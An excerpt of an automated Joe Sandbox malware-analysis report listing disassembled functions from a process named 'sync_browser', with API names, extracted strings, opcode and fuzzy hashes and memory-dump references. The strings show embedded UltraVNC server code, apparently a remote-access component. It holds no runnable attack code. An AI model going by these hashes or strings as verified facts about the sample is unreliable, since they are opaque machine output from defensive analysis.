                                                    • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                    • API String ID: 181403729-1081969236
                                                    • Opcode ID: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
                                                    • Instruction ID: 4cef316ed62041ae025cb29e5af30997d6c2cd242a7c36d9de0230e221fbcf33
                                                    • Opcode Fuzzy Hash: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
                                                    • Instruction Fuzzy Hash: 49513661A195D283F718EB64A8506FCA790EF85B58FC4403BED8E4B695DF3CD50AC360
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _wgetenv$free$_errno_invalid_parameter_noinfoinet_ntoa
                                                    • String ID: !$CONNECT_DIRECT$HTTP_DIRECT$SOCKS4_DIRECT$SOCKS5_DIRECT$SOCKS_DIRECT
                                                    • API String ID: 1123868200-453874877
                                                    • Opcode ID: f4207ed447fdffa40201c704a00f463fe897cbc6349214418793c6f2e263591f
                                                    • Instruction ID: 64f2c12395bcdc22752fe02dfb859d870574bae531e772c7399fb9ae849ac6cd
                                                    • Opcode Fuzzy Hash: f4207ed447fdffa40201c704a00f463fe897cbc6349214418793c6f2e263591f
                                                    • Instruction Fuzzy Hash: 61517862A0D682C6FE25AB11D5406BDA7A1EFA5F88FC80036DE4D47796EF3CE405C720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateRect$DeleteObject$Combinefree$ErrorFreeHeapLast_errnomalloc
                                                    • String ID:
                                                    • API String ID: 1881577244-0
                                                    • Opcode ID: 7b57e6a86c69e11d924fc1659c6f441e4a7cff23a46561e18de1fdb13dff7902
                                                    • Instruction ID: 7f3f7b0d6b3e0da9fce8f71260da6f41ca0ed4d6f6ac536a781caf51aa49d718
                                                    • Opcode Fuzzy Hash: 7b57e6a86c69e11d924fc1659c6f441e4a7cff23a46561e18de1fdb13dff7902
                                                    • Instruction Fuzzy Hash: 3AA1C272A186964BEB24AF26E444A6EBB55FBC8F98FD01236DE0E93754DF38D404C710
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Combine$DeleteObjectRectfree$Offset$Create
                                                    • String ID:
                                                    • API String ID: 2677898628-0
                                                    • Opcode ID: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
                                                    • Instruction ID: a6db8ac1a6fc7d84276f221971955a2775b35e0e9f1b382175ffc3b76cc11a85
                                                    • Opcode Fuzzy Hash: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
                                                    • Instruction Fuzzy Hash: E1412C72B249218AEB14EB76E8559AD7730FF88F98B804132DE1E67B68DF38D445C310
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$Leave$DesktopEnter$CloseInputInvalidateOpenRect
                                                    • String ID: W$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                    • API String ID: 1769082246-4238595597
                                                    • Opcode ID: 28edabc9feb7bdb14e1d1faffb3798e9d0b80a49f6f41662df86053fe061b59e
                                                    • Instruction ID: 008cd4a72adcf064a4db731e2211c0febbc8773ee879d57ee9b3b9df05e16486
                                                    • Opcode Fuzzy Hash: 28edabc9feb7bdb14e1d1faffb3798e9d0b80a49f6f41662df86053fe061b59e
                                                    • Instruction Fuzzy Hash: B2E1AE22A086D186E794EB29C458BFEBBA1EB85F98FC54032DE4D477A5CF38D451C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$Enter$Leave
                                                    • String ID: X$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                    • API String ID: 2801635615-1537001432
                                                    • Opcode ID: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
                                                    • Instruction ID: a7fae087a9452e951cfe1413c547258455b7c6d4769fe1d4e33669cd42bcb709
                                                    • Opcode Fuzzy Hash: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
                                                    • Instruction Fuzzy Hash: 65D1B322A086D186F790EB25C458BFEABA0EB85F88FC94132DE4D477A5CF39D455C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave
                                                    • String ID: vsocket.cpp : WriteExact: DSMPlugin-RestoreBuffer Alloc Error$vsocket.cpp : socket error 1: %d$vsocket.cpp : zero bytes read1$vsocket.cpp : zero bytes read2
                                                    • API String ID: 3168844106-4245644328
                                                    • Opcode ID: fb51c5f38e3ceb32ba6187375171630d2d9d6b8a6abb1b1af77451ade3fe2d73
                                                    • Instruction ID: 2ee3b69e5ea2732c055c9b8a6e05187a2805b25a7bc2ebcf924ab1c37f8539be
                                                    • Opcode Fuzzy Hash: fb51c5f38e3ceb32ba6187375171630d2d9d6b8a6abb1b1af77451ade3fe2d73
                                                    • Instruction Fuzzy Hash: 1861722190CB8287E764AB2994847BDA6A4FF84F98FD81132DE5E536A4DF3CD505CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$AddressFileFreeInitializeLoadModuleNameOpenPrivateProcProfileUninitialize
                                                    • String ID: CUPSD$CheckUserPasswordSDUni result=%i$WARNING$You selected ms-logon, but authSSP.dllwas not found.Check you installation$\authSSP.dll$vncntlm.cpp : GetProcAddress
                                                    • API String ID: 1719662965-904825817
                                                    • Opcode ID: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
                                                    • Instruction ID: cf5253fc9612976f3e0cadd3421826ca3fd4601742c7b8abbfe1797e63cc072f
                                                    • Opcode Fuzzy Hash: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
                                                    • Instruction Fuzzy Hash: E3418061A08A9287FA24AB25A801ABDAB90FF88F94FC44433DD5D477A5DF3CE504C730
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$LeaveObject$BitmapCompatibleCreateDeleteEnterSelect
                                                    • String ID:
                                                    • API String ID: 4219907860-0
                                                    • Opcode ID: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                    • Instruction ID: ff13674fc19d9f42b5781b36020326ba16ce0dc8743f349d48f161f88fb2ccf2
                                                    • Opcode Fuzzy Hash: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                    • Instruction Fuzzy Hash: 894166226286928BE724AF25A844AAEB754FF88FD8FC05136DE4E57B58DF3CD105C710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PrivateProfile$FileModuleNameStringVersion
                                                    • String ID: -service_run$_run$admin$clearconsole$kickrdp$service_commandline
                                                    • API String ID: 769895750-1251308945
                                                    • Opcode ID: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
                                                    • Instruction ID: fc3767ff9c90e218d3a3638557c6893166e276bdea2bc39a247324bdad02fb81
                                                    • Opcode Fuzzy Hash: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
                                                    • Instruction Fuzzy Hash: D651816560869286EB54AB24A840AADBBA0FF85BA4FC44337EE7D436D5CF3CD445C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$Free$AddressLoadProc
                                                    • String ID: ($GetMonitorInfoA$MonitorFromPointA$USER32
                                                    • API String ID: 1386263645-671781545
                                                    • Opcode ID: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
                                                    • Instruction ID: d48d9bfb5ec0682de7649809418e5e2e684470f4e57faf14a2077e7eab348873
                                                    • Opcode Fuzzy Hash: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
                                                    • Instruction Fuzzy Hash: 12415A3190C6028BEB68AB24E96473CA690EF95F5CFD04232CD1D462D8DF7DE488A721
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _wgetenv$NameUser_errno_invalid_parameter_noinfo
                                                    • String ID: CONNECT_USER$HTTP_PROXY_USER$SOCKS4_USER$SOCKS5_USER$SOCKS_USER
                                                    • API String ID: 3057866299-2798169553
                                                    • Opcode ID: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
                                                    • Instruction ID: be5c76c975e899c103b4cb09882f06000676077e14f2da0c3086bd9158d71623
                                                    • Opcode Fuzzy Hash: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
                                                    • Instruction Fuzzy Hash: A731F961A1E652C2FD59BB159491ABCE692EFA4F48FC81437DE0D462A1FF3CE944C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close$CreateOpenQueryValueVersion
                                                    • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                    • API String ID: 1076069355-3579764778
                                                    • Opcode ID: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
                                                    • Instruction ID: 1d3d61319e3ee4b00b7909eee60ae495cbb4e75fa957e9ee00b0438caea017ce
                                                    • Opcode Fuzzy Hash: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
                                                    • Instruction Fuzzy Hash: 9C312372618B8286EB509B20F4547AEF7A4FBC8B54FC00126EA8D47A58DF7CD155CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
